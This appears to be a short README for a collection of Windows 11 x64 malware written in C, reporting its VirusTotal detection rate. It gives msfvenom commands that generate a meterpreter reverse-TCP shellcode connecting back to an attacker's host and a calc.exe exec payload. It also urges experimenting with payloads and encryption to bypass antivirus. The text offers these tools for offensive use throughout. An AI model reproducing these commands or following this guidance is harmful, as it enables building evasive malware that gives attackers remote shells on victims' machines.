Writing different forms of malware for windows 11 x64 in C with msfvenom payloads. Code recived 28/72 Flags on Virus Total
Use msfvenom and diffrent payloads for desired result. DO NOT COPY MY SHELLCODE. Please genrate your own shellcode for security.
Reverse Shell (Use Metasploit Framework afterwards) Change the port, host, and variable name
msfvenom msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=80 -f c --var-name=insertVarNameHere
Opens a Calculator
msfvenom --platform windows --arch x64 -p windows/x64/exec CMD="cmd.exe /c calc.exe" -f csharp EXITFUNC=thread
Feel free to expirment with diffrent payloads and encryption to bypass AV